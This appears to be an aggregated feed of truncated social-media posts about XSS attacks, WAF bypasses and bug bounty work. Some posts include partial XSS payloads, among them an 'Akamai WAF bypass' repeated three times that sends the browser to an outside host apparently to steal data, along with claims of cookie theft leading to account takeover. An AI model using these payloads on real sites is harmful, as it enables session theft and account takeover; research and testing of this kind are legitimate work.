#HIP22 Gil Cohen talks about a new hacking technique named Frontend server #hijacking or Frontjacking. It could be leveraged by chaining multiple weakn ...July 1, 2022
XSS Vulnerability Scenarios (challenges)
This repository is a Dockerized PHP application containing some XSS vulnerability challenges.
The ideas behi ...June 21, 2022
Was exploiting XSS
Tried everything, but was getting blocked by the WAF.
Tried CRLF and bypassed the WAF.
XSS bypass using CRLF 🤔
#bugbounty #info ...June 15, 2022
New Bug Bounty Tool!
TTWAF, or Test This WAF, is a Web Application Firewall (WAF) bypass testing tool. You can test a list of payloads like XSS, LFI, ...June 15, 2022
#XSS is about to control user actions. The cited tweet + https://t.co/8itR4RuXwn helped me to have #XSS done
Payload: '"><p only=1337 onmouseen ...June 10, 2022
New Cloudflare WAF Bypass to Fetch Cookie and Escalating XSS to Account Takeover.
As if you use document.location=URI (Blocked)
but using location=`UR ...June 4, 2022
Does anyone know a bypass for the `</script>` in the urlencoded request body for Cloudflare #waf? It's a post based xss, so it should be possib ...May 31, 2022
Akamai XSS WAF bypass. Working in all browsers.
"><a/\test="%26quot;x%26quot;"href='%01javascript:/*%b1*/;location.assign("//hackerone.com/stea ...May 29, 2022
Akamai XSS WAF bypass. Working in all browsers.
"><a/\test="%26quot;x%26quot;"href='%01javascript:/*%b1*/;location.assign("//hackerone.com/stea ...May 27, 2022
Akamai XSS WAF bypass. Working in all browsers.
"><a/\test="%26quot;x%26quot;"href='%01javascript:/*%b1*/;location.assign("//hackerone.com/stea ...May 25, 2022
Top story: Bug Bounty Redacted #3: Hacking APIs & XSS, SQLi, WAF Bypass in a regional web application https://t.co/z3bSG2t3jg, see more https://t. ...May 18, 2022
Watch our third episode of Bug Bounty Redacted to learn about hacking APIs and finding XSS, SQLi, WAF Bypass in a regional web application. https://t. ...May 18, 2022
If you come across websites that use dotCMS, make sure to check those 2 bugs
1 : rxss
https://t.co/1ySlM5SrjE
Thanks @brutelogic for the WAF bypass );
2: broken ...May 13, 2022
I don't understand how knowing the origin IP can help you exploit that reflected XSS. A better example would have been a server side vulnerability.
A ...May 9, 2022